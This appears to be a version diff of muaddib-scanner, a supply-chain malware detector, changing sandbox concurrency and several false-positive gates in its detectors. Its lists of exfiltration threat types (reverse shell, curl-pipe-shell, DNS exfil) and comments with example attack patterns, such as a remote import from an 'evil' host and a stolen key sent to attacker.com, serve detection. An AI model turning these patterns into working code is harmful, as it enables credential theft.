muaddib-scanner 2.11.118 → 2.11.119

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.11.118",
+  "version": "2.11.119",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/{self-scan-v2.11.118.json → self-scan-v2.11.119.json}

@@ -1,6 +1,6 @@
 {
   "target": "node_modules",
-  "timestamp": "2026-06-15T12:53:45.305Z",
+  "timestamp": "2026-06-16T08:29:32.212Z",
   "threats": [
     {
       "type": "string_mutation_obfuscation",

package/src/monitor/daemon.js

@@ -9,7 +9,7 @@ const { setVerboseMode, isSandboxEnabled, isCanaryEnabled, isLlmDetectiveEnabled
 const { loadState, saveState, loadDailyStats, saveDailyStats, purgeTarballCache, isDailyReportDue, atomicWriteFileSync, saveNpmSeq, ALERTS_FILE, runStateMigrations, loadRecentlyScanned, saveRecentlyScanned } = require('./state.js');
 const { isTemporalEnabled, isTemporalAstEnabled, isTemporalPublishEnabled, isTemporalMaintainerEnabled } = require('./temporal.js');
 const { pendingGrouped, flushScopeGroup, sendDailyReport, redeliverPendingReportOnBoot, alertedPackageRules, ALERTED_PACKAGES_MAX: MAX_ALERTED_PACKAGES } = require('./webhook.js');
-const { poll, getPollBackoffMs } = require('./ingestion.js');
+const { poll, getPollBackoffMs, SOFT_BACKPRESSURE_THRESHOLD } = require('./ingestion.js');
 const { ensureWorkers, drainWorkers, getTargetConcurrency, setTargetConcurrency, getActiveWorkers, terminateAllWorkers, getInFlightItems, computeInterruptDisposition } = require('./queue.js');
 const { computeTarget, ADJUST_INTERVAL_MS, BASE_CONCURRENCY } = require('./adaptive-concurrency.js');
 const { startHealthcheck } = require('./healthcheck.js');
@@ -42,9 +42,25 @@ const SHUTDOWN_DRAIN_MAX_MS = (() => {
   return Number.isFinite(v) && v > 0 ? v : 20_000;
 })();
 
+// Drain ceiling (marge): re-ingest from the spill backlog as long as the live
+// queue stays a safe margin BELOW the ingestion backpressure point. The old
+// default (500) was unreachable in steady state — the live queue structurally
+// sits in the thousands (μ scan ≈ λ ingest in active hours), so the backlog
+// drained ~never and grew toward its cap (a one-way street). Tying the ceiling
+// to SOFT_BACKPRESSURE_THRESHOLD makes the drain a self-throttling trickle: it
+// fires during any non-congested window (pressure NONE + headroom) and stops as
+// the queue approaches the point where ingestion would pause anyway, so the
+// backlog never starves fresh ingestion. Env-tunable for live ops.
+const SPILL_DRAIN_MARGIN = (() => {
+  const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_MARGIN, 10);
+  return Number.isFinite(v) && v > 0 ? v : 5_000;
+})();
 const SPILL_DRAIN_THRESHOLD = (() => {
   const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_THRESHOLD, 10);
-  return Number.isFinite(v) && v > 0 ? v : 500;
+  if (Number.isFinite(v) && v > 0) return v;
+  // Default: a fixed margin below backpressure (30K - 5K = 25K). Clamp to >= 1
+  // in case a future backpressure value is smaller than the margin.
+  return Math.max(1, SOFT_BACKPRESSURE_THRESHOLD - SPILL_DRAIN_MARGIN);
 })();
 const SPILL_DRAIN_BATCH = (() => {
   const v = parseInt(process.env.MUADDIB_SPILL_DRAIN_BATCH, 10);

package/src/monitor/deferred-sandbox.js

@@ -6,11 +6,12 @@
  * Items are sorted by riskScore DESC (highest-risk first) to defend
  * against queue-poisoning attacks.
  *
- * The worker owns a dedicated sandbox slot (_deferredSlotBusy) that is
- * completely independent from the shared semaphore used by T1a/T1b/T2.
- * This guarantees the deferred worker can always process, regardless of
- * how many main-path sandboxes are running. The VPS supports N+1
- * concurrent gVisor containers (3 main + 1 deferred).
+ * The worker owns a dedicated POOL of sandbox slots (DEFERRED_SANDBOX_SLOTS,
+ * _deferredSlotsActive) that is completely independent from the shared semaphore
+ * used by the synchronous path. This guarantees the deferred worker can always
+ * process, regardless of how many main-path sandboxes are running, and runs
+ * several items concurrently so the queue actually drains (a single slot
+ * serialized all T1a deep sandboxes and the queue stayed permanently full).
  */
 const fs = require('fs');
 const path = require('path');
@@ -32,10 +33,23 @@ const DEFERRED_STATE_FILE = path.join(__dirname, '..', '..', 'data', 'deferred-q
 // slot. HIGH=10 pts is the intended T1b floor — values below 5 are LOW-only
 // aggregates which carry no actionable sandbox signal.
 const DEFERRED_MIN_SCORE = 5;
-// Hard ceiling on a single deferred sandbox run so the dedicated slot
-// (_deferredSlotBusy) can never wedge. maxRuns=1 self-bounds at ~SINGLE_RUN_TIMEOUT
-// (90s) + the sandbox watchdog grace; this AbortController is belt-and-suspenders.
+// Hard ceiling on a single deferred sandbox run so a deferred slot can never
+// wedge. maxRuns=1 self-bounds at ~SINGLE_RUN_TIMEOUT (90s) + the sandbox
+// watchdog grace; this AbortController is belt-and-suspenders.
 const DEFERRED_SANDBOX_TIMEOUT_MS = 150_000;
+// Number of CONCURRENT deferred sandbox runs. The old design used a single
+// boolean slot (1 at a time), which serialized ALL deferred T1a deep sandboxes
+// — measured at ~1 run / several minutes, so the queue (cap DEFERRED_QUEUE_MAX)
+// sat permanently full with items aging out at TTL. Phase 3 routed T1a's sandbox
+// here AND bypasses the shared semaphore, so the main pool (MUADDIB_SANDBOX_CONCURRENCY)
+// was sitting idle while everything queued behind one deferred slot. This pool
+// uses that idle capacity. Default 3 (conservative under the typical 4-slot main
+// pool); each gVisor container is ~512 MB, so 3 ≈ 1.5 GB — keep an eye on host
+// RSS if raised. Env-tunable for live ops.
+const DEFERRED_SANDBOX_SLOTS = (() => {
+  const v = parseInt(process.env.MUADDIB_DEFERRED_SANDBOX_SLOTS, 10);
+  return Number.isFinite(v) && v >= 1 ? v : 3;
+})();
 
 // Tier priority for the deferred queue. Phase 3 routes T1a's sandbox here (async)
 // instead of block-waiting a scan worker, so T1a is the highest-confidence tier and
@@ -61,7 +75,10 @@ const _deferredQueue = [];
 const _deferredSeen = new Set(); // name@version dedup
 let _workerHandle = null;
 let _stats = null; // reference to shared stats object
-let _deferredSlotBusy = false;   // Dedicated slot: true while deferred sandbox is running
+let _deferredSlotsActive = 0;    // Concurrent deferred sandbox runs in flight (0..DEFERRED_SANDBOX_SLOTS)
+// Indirection so tests can inject a controllable async sandbox without Docker
+// (the concurrency contract is verified behaviorally, not by source-grep).
+let _runSandboxFn = runSandbox;
 
 // ── Queue management ──
 
@@ -204,8 +221,11 @@ async function processDeferredItem(stats) {
 
   if (_deferredQueue.length === 0) return null;
 
-  // 2. Dedicated slot check — completely independent from main semaphore
-  if (_deferredSlotBusy) {
+  // 2. Pool slot check — completely independent from main semaphore. The
+  // synchronous prefix below (shift + increment) runs before the first await,
+  // so processDeferredBatch can launch several of these in a tight loop without
+  // over-subscribing: each increment is visible to the next iteration.
+  if (_deferredSlotsActive >= DEFERRED_SANDBOX_SLOTS) {
     if (stats) stats.deferredSkipped = (stats.deferredSkipped || 0) + 1;
     return null;
   }
@@ -215,10 +235,10 @@ async function processDeferredItem(stats) {
   const key = `${item.name}@${item.version}`;
   _deferredSeen.delete(key);
 
-  console.log(`[DEFERRED] PROCESSING: ${key} (tier=${_tierLabel(item.tier)}, score=${item.riskScore}, retries=${item.retries})`);
+  console.log(`[DEFERRED] PROCESSING: ${key} (tier=${_tierLabel(item.tier)}, score=${item.riskScore}, retries=${item.retries}, slots=${_deferredSlotsActive + 1}/${DEFERRED_SANDBOX_SLOTS})`);
 
-  // 4. Run sandbox on dedicated slot (bypasses shared semaphore)
-  _deferredSlotBusy = true;
+  // 4. Run sandbox on a pool slot (bypasses shared semaphore)
+  _deferredSlotsActive++;
   let sandboxResult;
   const ac = new AbortController();
   const deadline = setTimeout(() => ac.abort(), DEFERRED_SANDBOX_TIMEOUT_MS);
@@ -230,7 +250,7 @@ async function processDeferredItem(stats) {
     // single-run (maxRuns=1, ~90s vs ~270s) for fast deferred-queue drain.
     const maxRuns = item.tier === '1a' ? undefined : 1;
     markSandboxed(item.name); // stamp for sandbox-revalidation cadence (matches the synchronous path)
-    sandboxResult = await runSandbox(item.name, { canary, skipSemaphore: true, maxRuns, signal: ac.signal });
+    sandboxResult = await _runSandboxFn(item.name, { canary, skipSemaphore: true, maxRuns, signal: ac.signal });
     console.log(`[DEFERRED] SANDBOX COMPLETE: ${key} -> score=${sandboxResult.score}, severity=${sandboxResult.severity}`);
   } catch (err) {
     console.error(`[DEFERRED] SANDBOX ERROR: ${key} — ${err.message}`);
@@ -247,7 +267,7 @@ async function processDeferredItem(stats) {
     return null;
   } finally {
     clearTimeout(deadline);
-    _deferredSlotBusy = false;
+    _deferredSlotsActive--;
   }
 
   // 5. Follow-up webhook if sandbox found something
@@ -302,6 +322,31 @@ async function processDeferredItem(stats) {
   return sandboxResult;
 }
 
+/**
+ * Tick dispatcher: launch deferred items CONCURRENTLY up to the free pool slots.
+ * processDeferredItem runs its slot-acquire (shift + increment) synchronously
+ * before its first await, so each launch is visible to the next loop iteration —
+ * no over-subscription past DEFERRED_SANDBOX_SLOTS. Calls are fire-and-forget:
+ * processDeferredItem is fully self-contained (its try/catch/finally swallows
+ * sandbox errors and always releases the slot), so a launched run never rejects
+ * the dispatcher. Returns the number launched this tick (for tests/observability).
+ * @returns {number}
+ */
+function processDeferredBatch(stats) {
+  let launched = 0;
+  // Bound the loop by the free slot count so a transient queue can't spin it.
+  while (_deferredSlotsActive < DEFERRED_SANDBOX_SLOTS && _deferredQueue.length > 0) {
+    const before = _deferredSlotsActive;
+    const p = processDeferredItem(stats);
+    // If the slot wasn't acquired (e.g. queue emptied by pruning inside the call),
+    // stop — otherwise the guard above could loop without progress.
+    if (_deferredSlotsActive === before) break;
+    launched++;
+    if (p && typeof p.catch === 'function') p.catch(() => { /* self-handled */ });
+  }
+  return launched;
+}
+
 /**
  * Build Discord embed for deferred sandbox follow-up.
  */
@@ -348,10 +393,14 @@ function buildDeferredFollowUpEmbed(name, version, ecosystem, sandboxResult, sta
 function startDeferredWorker(stats) {
   _stats = stats;
   if (_workerHandle) return _workerHandle;
-  console.log(`[DEFERRED] Worker started (interval=${DEFERRED_WORKER_INTERVAL_MS / 1000}s, max=${DEFERRED_QUEUE_MAX}, ttl=${DEFERRED_TTL_MS / 3600000}h)`);
-  _workerHandle = setInterval(async () => {
+  console.log(`[DEFERRED] Worker started (interval=${DEFERRED_WORKER_INTERVAL_MS / 1000}s, max=${DEFERRED_QUEUE_MAX}, slots=${DEFERRED_SANDBOX_SLOTS}, ttl=${DEFERRED_TTL_MS / 3600000}h)`);
+  _workerHandle = setInterval(() => {
     try {
-      await processDeferredItem(_stats);
+      // Fill free pool slots each tick. The dispatcher launches concurrent runs
+      // (fire-and-forget); long-running sandboxes keep their slots across ticks,
+      // so steady state is DEFERRED_SANDBOX_SLOTS in flight while the queue drains.
+      pruneExpired(_stats);
+      processDeferredBatch(_stats);
     } catch (err) {
       console.error(`[DEFERRED] Worker tick error: ${err.message}`);
     }
@@ -465,12 +514,25 @@ function _resetDeferredQueue() {
   _deferredQueue.length = 0;
   _deferredSeen.clear();
   _stats = null;
-  _deferredSlotBusy = false;
+  _deferredSlotsActive = 0;
+  _runSandboxFn = runSandbox;
   stopDeferredWorker();
 }
 
+// Test seam: inject a controllable sandbox runner (restored by _resetDeferredQueue).
+function _setRunSandboxForTest(fn) {
+  _runSandboxFn = fn || runSandbox;
+}
+
+// True while at least one deferred sandbox is in flight. Kept for back-compat
+// (callers/tests that only care "is the deferred path active"); use
+// getDeferredSlotsActive() for the concurrent count.
 function isDeferredSlotBusy() {
-  return _deferredSlotBusy;
+  return _deferredSlotsActive > 0;
+}
+
+function getDeferredSlotsActive() {
+  return _deferredSlotsActive;
 }
 
 /**
@@ -492,14 +554,18 @@ module.exports = {
   startDeferredWorker,
   stopDeferredWorker,
   processDeferredItem,
+  processDeferredBatch,
   persistDeferredQueue,
   restoreDeferredQueue,
   buildDeferredFollowUpEmbed,
   pruneExpired,
   isDeferredSlotBusy,
+  getDeferredSlotsActive,
   clearDeferredQueue,
   _resetDeferredQueue,
+  _setRunSandboxForTest,
   DEFERRED_QUEUE_MAX,
+  DEFERRED_SANDBOX_SLOTS,
   DEFERRED_TTL_MS,
   DEFERRED_MAX_RETRIES,
   DEFERRED_WORKER_INTERVAL_MS,

package/src/monitor/ingestion.js

@@ -1528,6 +1528,7 @@ module.exports = {
   POLL_INTERVAL,
   POLL_MAX_BACKOFF,
   MAX_RESPONSE_BYTES,
+  SOFT_BACKPRESSURE_THRESHOLD,
 
   // Mutable state
   getConsecutivePollErrors,

package/src/monitor/spill.js

@@ -182,7 +182,13 @@ function _compactBacklog(file, ledgerFn = null) {
 
 /**
  * Pure drain predicate (exported for tests + the daemon main loop): drain only
- * when memory pressure is fully cleared AND the live queue has headroom.
+ * when memory pressure is fully cleared AND the live queue is below the drain
+ * ceiling. `threshold` is a MARGE ceiling (a margin below the ingestion
+ * backpressure point — see daemon.js SPILL_DRAIN_THRESHOLD), NOT a "queue nearly
+ * empty" low-water mark: the latter (the old 500/5000) was unreachable in steady
+ * state, so the backlog never drained. With the marge ceiling the drain is a
+ * self-throttling trickle — it auto-stops the moment pressure rises (≥ ELEVATED)
+ * or the queue climbs toward backpressure, so it never starves fresh ingestion.
  */
 function shouldDrain(pressureLevel, queueLen, threshold) {
   return pressureLevel === 0 && queueLen < threshold;

package/src/scanner/ast-detectors/handle-import-expression.js

@@ -3,6 +3,55 @@
 const {
   SOLANA_PACKAGES
 } = require('./constants.js');
+const { containsDecodePattern } = require('./helpers.js');
+
+// Gate #2 (FPR 2026-06-15 — Étape 0 adjudication): a computed dynamic import() is only
+// remote-code-loading when there is positive evidence of a remote/decoded/env-driven target
+// (URL literal, .replace() URL manipulation, atob/Buffer decode, or a process.env-sourced
+// specifier). Bounded-local imports — CLI subcommand dispatchers (import(MAP[cmd])), layout/i18n
+// loaders (import(`../x/${name}.js`)), dep-resolve / own-dist shims (import(join(dir,'dist/main.js')))
+// — were ~19% of the band-20-49 false positives with 0 TP. Without evidence, computed imports
+// stay HIGH (still fires, but ~25→10 pts: sub-threshold alone) instead of CRITICAL. Flag-gated;
+// when the flag is off the legacy CRITICAL-on-Identifier/TemplateLiteral behavior is preserved.
+function _importStaticText(node) {
+  if (!node) return '';
+  if (node.type === 'Literal') return typeof node.value === 'string' ? node.value : '';
+  if (node.type === 'TemplateLiteral') {
+    return (node.quasis || [])
+      .map(q => (q.value && (q.value.cooked != null ? q.value.cooked : q.value.raw)) || '')
+      .join(' ');
+  }
+  if (node.type === 'BinaryExpression' && node.operator === '+') {
+    return _importStaticText(node.left) + ' ' + _importStaticText(node.right);
+  }
+  return '';
+}
+
+function _isProcessEnvMember(node) {
+  return !!node && node.type === 'MemberExpression' &&
+    node.object && node.object.type === 'MemberExpression' &&
+    node.object.object && node.object.object.type === 'Identifier' && node.object.object.name === 'process' &&
+    node.object.property && node.object.property.type === 'Identifier' && node.object.property.name === 'env';
+}
+
+function _importRemoteEvidence(src, ctx) {
+  // URL manipulation (GlassWorm): import(x.replace(...))
+  if (src.type === 'CallExpression' && src.callee && src.callee.type === 'MemberExpression' &&
+      src.callee.property && src.callee.property.name === 'replace') return true;
+  // env-driven specifier: import(process.env.X), or import(v) where v was assigned from process.env.X
+  if (_isProcessEnvMember(src)) return true;
+  if (src.type === 'Identifier' && ctx.varSource && ctx.varSource.get(src.name) === 'env_var') return true;
+  // identifier resolving to a URL string literal: const u = 'https://evil/x.js'; import(u)
+  if (src.type === 'Identifier' && ctx.stringVarValues) {
+    const resolved = ctx.stringVarValues.get(src.name);
+    if (resolved && /https?:|:\/\//i.test(resolved)) return true;
+  }
+  // runtime decode: import(atob(...)) / import(Buffer.from(...).toString())
+  if (containsDecodePattern(src)) return true;
+  // explicit URL scheme in the static parts of the specifier
+  if (/https?:|:\/\//i.test(_importStaticText(src))) return true;
+  return false;
+}
 
 function handleImportExpression(node, ctx) {
   if (node.source) {
@@ -25,11 +74,29 @@ function handleImportExpression(node, ctx) {
       if (SOLANA_PACKAGES.some(pkg => src.value === pkg)) {
         ctx.hasSolanaImport = true;
       }
+    } else if (process.env.MUADDIB_DYNIMPORT_BOUNDED === '1') {
+      // Gate #2 (downgrade-only — never escalates above legacy severity, so it cannot raise FPR):
+      // a legacy-CRITICAL computed import (Identifier / TemplateLiteral / .replace URL) drops to HIGH
+      // when there is NO remote/decode/env evidence (bounded/local: CLI dispatchers, layout/i18n
+      // loaders, dep-resolve shims). With evidence it stays CRITICAL; a legacy-HIGH argument stays HIGH.
+      const legacyCritical = src.type === 'Identifier' || src.type === 'TemplateLiteral' ||
+        (src.type === 'CallExpression' && src.callee?.property?.name === 'replace');
+      const bounded = legacyCritical && !_importRemoteEvidence(src, ctx);
+      ctx.threats.push({
+        type: 'dynamic_import',
+        severity: bounded ? 'HIGH' : (legacyCritical ? 'CRITICAL' : 'HIGH'),
+        message: bounded
+          ? 'Dynamic import() with computed (bounded/local) argument — possible obfuscation.'
+          : (legacyCritical
+              ? 'Dynamic import() with computed URL argument — remote code loading from dynamically constructed URL.'
+              : 'Dynamic import() with computed argument (possible obfuscation).'),
+        file: ctx.relFile
+      });
     } else {
-      // Blue Team v8b (C6): Dynamic import with non-literal arg — if it's a variable
-      // built from URL manipulation, this is remote code loading
-      const isCritical = node.source.type === 'Identifier' || node.source.type === 'TemplateLiteral' ||
-        (node.source.type === 'CallExpression' && node.source.callee?.property?.name === 'replace');
+      // Legacy behavior (gate off): Blue Team v8b (C6) — non-literal arg is CRITICAL when it
+      // looks like a constructed URL (Identifier / TemplateLiteral / .replace()).
+      const isCritical = src.type === 'Identifier' || src.type === 'TemplateLiteral' ||
+        (src.type === 'CallExpression' && src.callee?.property?.name === 'replace');
       ctx.threats.push({
         type: 'dynamic_import',
         severity: isCritical ? 'CRITICAL' : 'HIGH',

package/src/scanner/ast-detectors/handle-post-walk.js

@@ -216,6 +216,11 @@ function handlePostWalk(ctx) {
     });
   }
 
+  // Per-file network-destination verdict (decoy-safe): true iff every literal host is
+  // local/reserved or a curated provider; any public-IP/suspicious/unknown host — or no host —
+  // ⇒ false. Reused by the detached/uncaught-exfil compounds below.
+  const destAllBenign = ctx._content ? networkDestinationsAllBenign(ctx._content) : false;
+
   // Credential regex harvesting: credential-matching regex + network call in same file
   // Real-world pattern: Transform/stream that scans data for tokens/passwords and exfiltrates
   if (ctx.hasCredentialRegex && ctx.hasNetworkCallInFile) {
@@ -328,7 +333,7 @@ function handlePostWalk(ctx) {
   // destination in the file is first-party/local/provider (e.g. an otel collector on
   // localhost, an SDK POST to its own API). A suspicious/unknown/public-IP host — or no
   // literal host at all — leaves it firing (conservative: confirmed-benign only).
-  const destAllBenign = ctx._content ? networkDestinationsAllBenign(ctx._content) : false;
+  // (destAllBenign is computed once above, at the credential_regex_harvest emission site.)
   if (hasDetachedInFile && hasSensitiveEnvInFile && ctx.hasNetworkCallInFile && !destAllBenign) {
     ctx.threats.push({
       type: 'detached_credential_exfil',

package/src/scanner/dataflow.js

@@ -1043,6 +1043,40 @@ function analyzeFile(content, filePath, basePath) {
       }
     }
 
+    // Gate #1 (FPR 2026-06-15 — Étape 0 adjudication): the C7 block above only covers pure
+    // env_read sources; the dominant live FP cluster (~25% of band 20-49, 0 TP) is a
+    // credential_env_read API key (OPENAI_API_KEY, YINGDAO_ACCESS_TOKEN, …) flowing to the
+    // package's OWN first-party API or a curated provider. The decoy-safe discriminant is
+    // brand coherence (env-var brand ↔ host label) + curated providers + local hosts, applied
+    // to EVERY destination. Limited to env-like sources (a credential_read FILE, command_output,
+    // or fingerprint_read source stays CRITICAL — those are genuinely higher-risk). Downgrade to
+    // MEDIUM so the signal survives; residual = compromised first-party domain, the same risk the
+    // mature/MT-1 cap already accepts. Flag-gated (default off) for measure-then-flip rollout.
+    if (process.env.MUADDIB_DF_SDK_GATE === '1' &&
+        (severity === 'CRITICAL' || severity === 'HIGH')) {
+      const envLike = sources.filter(s => s.type === 'env_read' || s.type === 'credential_env_read');
+      const onlyEnvLike = sources.every(s =>
+        s.type === 'env_read' || s.type === 'credential_env_read' || s.type === 'telemetry_read');
+      if (envLike.length > 0 && onlyEnvLike) {
+        try {
+          const { extractBrandFromEnvVar, networkDestinationsAllBenignOrBrand } = require('../sdk-destination.js');
+          const gateContent = fs.readFileSync(filePath, 'utf8');
+          const brands = envLike.map(s => {
+            const envVar = s.name
+              .replace(/^process\.env\./, '')
+              .replace(/^process\.env\[['"]/, '')
+              .replace(/['"]\]$/, '');
+            return extractBrandFromEnvVar(envVar);
+          }).filter(Boolean);
+          if (networkDestinationsAllBenignOrBrand(gateContent, brands)) {
+            severity = 'MEDIUM';
+          }
+        } catch {
+          // sdk-destination / file read unavailable — keep severity
+        }
+      }
+    }
+
     const sourceDesc = hasCommandOutput ? 'command output' : 'credentials read';
     threats.push({
       type: 'suspicious_dataflow',

package/src/scoring.js

@@ -1051,6 +1051,25 @@ function _hasExfilSink(threats) {
   return threats.some(t => EXFIL_SINK_TYPES.has(t.type) && t.severity !== 'LOW');
 }
 
+// Sink-coupling (chantier 2026-06-15): the subset of EXFIL_SINK_TYPES that PROVES taint or
+// unambiguous structural malice — NOT mere host-reputation string presence. When one of these
+// co-occurs with credential_regex_harvest it stays HIGH (anti-FN floor: protects cross-file
+// read→exfil and the intent/detached/staged compounds). The complement (suspicious_domain,
+// direct_ip_exfil, ioc_string_match, ioc_match) is host-reputation-only.
+const PROVEN_EXFIL_SINK_TYPES = new Set([
+  'known_malicious_package', 'pypi_malicious_package', 'shai_hulud_marker',
+  'detached_credential_exfil', 'silent_stealth_process',
+  'curl_pipe_shell', 'curl_env_exfil', 'reverse_shell', 'dns_exfil', 'oast_callback',
+  'function_constructor_require', 'staged_remote_loader', 'staged_eval_decode',
+  'fetch_decrypt_exec', 'download_exec_binary', 'self_destruct_eval',
+  'newsletter_auto_follow', 'cross_file_dataflow', 'intent_credential_exfil',
+  'intent_command_exfil', 'sandbox_known_exfil_domain', 'sandbox_network_after_sensitive_read'
+]);
+function _hasProvenExfilSink(threats) {
+  if (!Array.isArray(threats)) return false;
+  return threats.some(t => PROVEN_EXFIL_SINK_TYPES.has(t.type) && t.severity !== 'LOW');
+}
+
 function applyFPReductions(threats, reachableFiles, packageName, packageDeps, reachableFunctions) {
   // Initialize reductions audit trail on each threat
   // Store original severity before any FP reductions, so compound
@@ -1206,13 +1225,23 @@ function applyFPReductions(threats, reachableFiles, packageName, packageDeps, re
   // taint ...). When no such sink is present, downgrade HIGH/CRITICAL → LOW. Runs after the dilution
   // floor so the floor's restored instance is also gated (the floor protects real exfil; with no sink
   // there is nothing to protect). No GT sample relies on credential_regex_harvest (verified).
-  if (!_hasExfilSink(threats)) {
-    for (const t of threats) {
-      if (t.type === 'credential_regex_harvest' && (t.severity === 'HIGH' || t.severity === 'CRITICAL')) {
-        t.reductions.push({ rule: 'sink_coupling', from: t.severity, to: 'LOW' });
-        t.severity = 'LOW';
-      }
+  // Sink-coupling for credential_regex_harvest (per-instance, two-way): a proven taint /
+  // structural-malice sink ⇒ keep HIGH (anti-FN floor); no exfil sink at all ⇒ LOW.
+  const _crhProvenSink = _hasProvenExfilSink(threats);
+  const _crhAnySink = _hasExfilSink(threats);
+  for (const t of threats) {
+    if (t.type !== 'credential_regex_harvest') continue;
+    if (t.severity !== 'HIGH' && t.severity !== 'CRITICAL') continue;
+    // (1) anti-FN floor: a proven taint / structural-malice sink ⇒ keep HIGH (host/flag irrelevant).
+    if (_crhProvenSink) continue;
+    // (2) no exfil sink at all ⇒ LOW (legacy behavior, flag-independent).
+    if (!_crhAnySink) {
+      t.reductions.push({ rule: 'sink_coupling', from: t.severity, to: 'LOW' });
+      t.severity = 'LOW';
+      continue;
     }
+    // (3) only host-reputation sink(s) co-occur ⇒ keep HIGH (fall-through). A host-coupling
+    //     downgrade here (gate #3, MUADDIB_CRH_HOST_GATE) was measured inert and removed 2026-06-15.
   }
 
   for (const t of threats) {

package/src/sdk-destination.js

@@ -308,6 +308,45 @@ function networkDestinationsAllBenign(fileContent) {
   return true;
 }
 
+/**
+ * Gate #1 variant of networkDestinationsAllBenign: a host ALSO passes if one of its labels
+ * matches a credential env-var BRAND (e.g. YINGDAO_ACCESS_TOKEN → api.yingdao.com). This covers
+ * the dominant credential→own-API FP cluster (Étape 0 2026-06-15: ~25% of band 20-49, 0 TP) that
+ * networkDestinationsAllBenign rejects because a package's own domain is not a curated provider.
+ * Decoy-safe by construction: EVERY host must be local/reserved OR a curated provider OR
+ * brand-coherent; any unknown / public-IP / suspicious-tunnel host ⇒ false. No hosts ⇒ false.
+ * Brand coherence is not attacker-spoofable for the credential-theft case: stealing a VICTIM's
+ * OTHER-service key (OPENAI_API_KEY) and sending it to attacker.com yields brand "openai" vs label
+ * "attacker" ⇒ mismatch ⇒ keeps firing.
+ *
+ * @param {string} fileContent - source of the file containing the network sink
+ * @param {string[]} brands - brand tokens extracted from the credential env-var names
+ * @returns {boolean}
+ */
+function networkDestinationsAllBenignOrBrand(fileContent, brands) {
+  const hosts = extractHostsFromContent(fileContent);
+  if (hosts.length === 0) return false;
+  // RFC 2606 / 6761 documentation & test placeholders (example.com/.net/.org, *.test, *.invalid)
+  // are NOT real SDK destinations — no benign SDK ships a live credential flow to example.com.
+  // A credential→placeholder flow is either a synthetic exfil sample or an evasion stand-in, so it
+  // must keep firing (it is deliberately NOT in the local-IPC benign class, unlike loopback/RFC1918).
+  const DOC_DOMAIN_RE = /(^|\.)example\.(?:com|net|org)$|\.(?:test|example|invalid)$/i;
+  const brandSet = (brands || [])
+    .map(b => String(b || '').toLowerCase())
+    .filter(b => b.length >= 3);
+  for (const h of hosts) {
+    if (SUSPICIOUS_DOMAIN_PATTERNS.test(h)) return false;
+    if (isPublicIpHost(h)) return false;
+    if (DOC_DOMAIN_RE.test(h)) return false;
+    if (isLocalOrReservedHost(h)) continue;
+    if (PROVIDER_DOMAIN_SUFFIXES.some(s => domainMatchesSuffix(h, [s]))) continue;
+    const labels = String(h).toLowerCase().split('.');
+    if (brandSet.length && labels.some(l => brandSet.includes(l))) continue;
+    return false; // unknown / unrecognised destination → keep firing
+  }
+  return true;
+}
+
 module.exports = {
   SDK_ENV_DOMAIN_MAP,
   ENV_NOISE_TOKENS,
@@ -320,6 +359,7 @@ module.exports = {
   extractDomain,
   domainMatchesSuffix,
   isSDKPattern,
+  networkDestinationsAllBenignOrBrand,
   stripPort,
   isLocalOrReservedHost,
   isPublicIpHost,